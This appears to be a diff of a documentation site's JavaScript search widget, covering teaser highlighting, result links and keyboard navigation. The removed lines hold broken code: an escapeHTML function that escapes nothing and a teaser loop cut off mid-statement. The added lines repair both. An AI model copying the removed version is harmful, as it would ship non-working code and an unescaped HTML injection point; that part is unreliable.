- /* ───────────── helpers (teaser, metric) ───────────── */
- const escapeHTML = (()=>{const M={'&':'&','<':'<','>':'>','"':'"','\'':'''};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})();
- const URL_MARK='highlight';
- function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;}
-
- function makeTeaser(body,terms){
- const stem=w=>elasticlunr.stemmer(w.toLowerCase());
- const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30;
- const W=[],sents=body.toLowerCase().split('. ');
- let i=0,v=W_F,found=false;
- sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;});
- if(!W.length) return body;
- const win=Math.min(W.length,WIN);
- const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)];
- for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1];
- const best=found?sums.lastIndexOf(Math.max(...sums)):0;
- const out=[]; i=W[best][2];
- for(let k=best;k'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push(''); i=pos+w.length;}
- return out.join('');
- }
-
- function format(d,terms){
- const teaser=makeTeaser(escapeHTML(d.body),terms);
- teaserCount++;
- const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27');
- const parts=d.url.split('#'); if(parts.length===1) parts.push('');
- const abs=d.url.startsWith('http');
- const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`;
- const style=d.cloud?" style=\"color:#1e88e5\"":"";
- const isCloud=d.cloud?" [Cloud]":" [Book]";
- return `<a href="${href}"${style}>`+
- `<span class="result-title">${d.breadcrumbs}${isCloud}</span><span class="teaser" aria-label="Search Result Teaser">${teaser}</span></a>`;
- }
-
- /* ───────────── UI control ───────────── */
- function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}}
- function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();}
-
- icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden')));
-
- document.addEventListener('keydown',e=>{
- if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return;
- const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName);
- if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();}
- else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}}
- else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}}
- });
-
- bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage(e.target.value.trim()),120); });
-
- /* ───────────── worker messages ───────────── */
- worker.onmessage = ({data}) => {
- if(data && data.ready!==undefined){
- if(data.ready){
- icon.innerHTML=READY_ICON;
- icon.setAttribute('aria-label','Open search (S)');
- icon.removeAttribute('title');
- }
- else {
- icon.textContent='❌';
- icon.setAttribute('aria-label','Search unavailable');
- icon.setAttribute('title','Search is unavailable');
- }
- return;
+
+ const HOT=83, ESC=27, DOWN=40, UP=38, ENTER=13;
+ let debounce, teaserCount=0;
+
+ /* ───────────── helpers (teaser, metric) ───────────── */
+ const escapeHTML = (()=>{const M={'&':'&amp;','<':'&lt;','>':'&gt;','"':'&quot;','\'':'&#39;'};return s=>s.replace(/[&<>'"]/g,c=>M[c]);})();
+ const URL_MARK='highlight';
+ function metric(c,t){return c?`${c} search result${c>1?'s':''} for '${t}':`:`No search results for '${t}'.`;}
+
+ function makeTeaser(body,terms){
+ const stem=w=>elasticlunr.stemmer(w.toLowerCase());
+ const T=terms.map(stem),W_S=40,W_F=8,W_N=2,WIN=30;
+ const W=[],sents=body.toLowerCase().split('. ');
+ let i=0,v=W_F,found=false;
+ sents.forEach(s=>{v=W_F; s.split(' ').forEach(w=>{ if(w){ if(T.some(t=>stem(w).startsWith(t))){v=W_S;found=true;} W.push([w,v,i]); v=W_N;} i+=w.length+1; }); i++;});
+ if(!W.length) return body;
+ const win=Math.min(W.length,WIN);
+ const sums=[W.slice(0,win).reduce((a,[,wt])=>a+wt,0)];
+ for(let k=1;k<=W.length-win;k++) sums[k]=sums[k-1]-W[k-1][1]+W[k+win-1][1];
+ const best=found?sums.lastIndexOf(Math.max(...sums)):0;
+ const out=[]; i=W[best][2];
+ for(let k=best;k<best+win;k++){const [w,wt,pos]=W[k]; out.push(body.substring(i,pos)); if(wt===W_S) out.push('<em>'); out.push(body.substr(pos,w.length)); if(wt===W_S) out.push('</em>'); i=pos+w.length;}
+ return out.join('');
}
- const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean);
- header.textContent=metric(docs.length,q);
- clear(list);
- docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);});
- listOut.classList.toggle('hidden',!docs.length);
- };
-})();
-
+
+ function format(d,terms){
+ const teaser=makeTeaser(escapeHTML(d.body),terms);
+ teaserCount++;
+ const enc=encodeURIComponent(terms.join(' ')).replace(/'/g,'%27');
+ const parts=d.url.split('#'); if(parts.length===1) parts.push('');
+ const abs=d.url.startsWith('http');
+ const href=`${abs?'':path_to_root}${parts[0]}?${URL_MARK}=${enc}#${parts[1]}`;
+ const style=d.cloud?" style=\"color:#1e88e5\"":"";
+ const isCloud=d.cloud?" [Cloud]":" [Book]";
+ return `<a href="${href}"${style}>`+
+ `<span class="result-title">${d.breadcrumbs}${isCloud}</span><span class="teaser" aria-label="Search Result Teaser">${teaser}</span></a>`;
+ }
+
+ /* ───────────── UI control ───────────── */
+ function showUI(s){wrap.classList.toggle('hidden',!s); icon.setAttribute('aria-expanded',s); if(s){window.scrollTo(0,0); bar.focus(); bar.select();} else {listOut.classList.add('hidden'); [...list.children].forEach(li=>li.classList.remove('focus'));}}
+ function blur(){const t=document.createElement('input'); t.style.cssText='position:absolute;opacity:0;'; icon.appendChild(t); t.focus(); t.remove();}
+
+ icon.addEventListener('click',()=>showUI(wrap.classList.contains('hidden')));
+
+ document.addEventListener('keydown',e=>{
+ if(e.altKey||e.ctrlKey||e.metaKey||e.shiftKey) return;
+ const f=/^(?:input|select|textarea)$/i.test(e.target.nodeName);
+ if(e.keyCode===HOT && !f){e.preventDefault(); showUI(true);} else if(e.keyCode===ESC){e.preventDefault(); showUI(false); blur();}
+ else if(e.keyCode===DOWN && document.activeElement===bar){e.preventDefault(); const first=list.firstElementChild; if(first){blur(); first.classList.add('focus');}}
+ else if([DOWN,UP,ENTER].includes(e.keyCode) && document.activeElement!==bar){const cur=list.querySelector('li.focus'); if(!cur) return; e.preventDefault(); if(e.keyCode===DOWN){const nxt=cur.nextElementSibling; if(nxt){cur.classList.remove('focus'); nxt.classList.add('focus');}} else if(e.keyCode===UP){const prv=cur.previousElementSibling; cur.classList.remove('focus'); if(prv){prv.classList.add('focus');} else {bar.focus();}} else {const a=cur.querySelector('a'); if(a) window.location.assign(a.href);}}
+ });
+
+ bar.addEventListener('input',e=>{ clearTimeout(debounce); debounce=setTimeout(()=>worker.postMessage({query: e.target.value.trim()}),120); });
+
+ /* ───────────── worker messages ───────────── */
+ worker.onmessage = ({data}) => {
+ if(data && data.ready!==undefined){
+ if(data.ready){
+ icon.innerHTML=READY_ICON;
+ icon.setAttribute('aria-label','Open search (S)');
+ icon.removeAttribute('title');
+ }
+ else {
+ icon.textContent='❌';
+ icon.setAttribute('aria-label','Search unavailable');
+ icon.setAttribute('title','Search is unavailable');
+ }
+ return;
+ }
+ const docs=data, q=bar.value.trim(), terms=q.split(/\s+/).filter(Boolean);
+ header.textContent=metric(docs.length,q);
+ clear(list);
+ docs.forEach(d=>{const li=document.createElement('li'); li.innerHTML=format(d,terms); list.appendChild(li);});
+ listOut.classList.toggle('hidden',!docs.length);
+ };
+ })();
+
\ No newline at end of file